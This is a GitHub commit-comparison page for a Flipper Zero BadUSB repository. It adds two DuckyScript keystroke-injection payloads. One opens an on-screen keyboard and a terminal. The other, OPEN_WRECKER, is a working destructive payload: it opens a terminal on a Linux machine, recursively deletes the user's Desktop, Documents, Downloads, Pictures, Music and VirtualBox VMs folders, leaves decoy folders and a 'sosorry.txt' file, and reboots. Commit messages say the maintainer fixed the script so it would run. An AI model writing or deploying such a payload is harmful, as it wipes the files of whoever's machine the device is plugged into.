Compare commits

...

9 Commits

Author SHA1 Message Date
UberGuidoZ
95db5f5186
Merge pull request #376 from FLIZZ3R/patch-3
Create FZROPEN_WRECKER.txt
2023-04-13 17:49:56 -07:00
UberGuidoZ
df41686ef7
Moved to BadUSB and into folder 2023-04-13 17:48:24 -07:00
UberGuidoZ
c6594866c8
Fixed script (would not work otherwise), added warning 2023-04-13 17:47:40 -07:00
UberGuidoZ
f6433e4b03
Merge pull request #375 from FLIZZ3R/patch-2
Create EMERGENKEY_FZR.txt
2023-04-13 17:45:20 -07:00
UberGuidoZ
76100fb983
Moved to BadUSB and organized into a folder 2023-04-13 17:45:08 -07:00
UberGuidoZ
6ff2b9c43f
Fixed code (would not work previously) 2023-04-13 17:43:45 -07:00
UberGuidoZ
b89701ca7b Updated submodule 2023-04-13 11:00:28 -07:00
David Martinez
15a4a79c64
Create FZROPEN_WRECKER.txt
Small update to reboot or shutdown. Ensure open_wrecker did the job
2023-04-12 16:49:17 -07:00
David Martinez
de9ad43037
Create EMERGENKEY_FZR.txt 2023-04-12 16:45:58 -07:00
3 changed files with 44 additions and 1 deletions

View File

@ -0,0 +1,14 @@
REM Author:FLIZZ3R
REM TITLE:EMERGENKEY
REM OBJECTIVE:LINUX GOOD USB OPEN ONBOARD KEYBOARD IN AN INSTANT AND OPEN TERMINAL IF YOUR IN A JAM
REM FLIZZ3R DOESN'T ALLOW USAGE WITHOUT CONSENT OR ILLEGAL USAGE
GUI r
DELAY 1000
STRING Onboard
ENTER
DELAY 1000
CTRL-ALT t
DELAY 100
STRING ls
ENTER

View File

@ -0,0 +1,29 @@
REM Author: FLIZZ3R
REM TITLE: OPEN_WRECKER
REM *** CAUTION *** This is a destructive payload. KNOW WHAT YOU'RE DOING BEFORE RUNNING.
REM OBJECTIVE: Wipe open linux machine directories then create dummy directories and sorry text file
REM ** Added Reboot for shutdown :< shutdown -h now>: ***
DELAY 500
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 1500
STRING rm -r Desktop Downloads Pictures #snap Documents Music Public Templates +++'VirtualBox VMs'
ENTER
DELAY 1500
STRING mkdir Deskop downloadz Pics Dox ++Music Public TEMPS Vms
ENTER
DELAY 500
STRING cd Deskop
ENTER
DELAY 500
STRING touch sosorry.txt
ENTER
ALT F4
DELAY 100
CTRL-ALT t
DELAY 1000
STRING reboot
ENTER
REM :::FLIZZ3R@DISCORD)))

@ -1 +1 @@
Subproject commit 9e9acead4aa0ab612d388ef76f5e500034671ad3 Subproject commit 28ba8c9d7d20c6c602b0961cf53c1981b052d341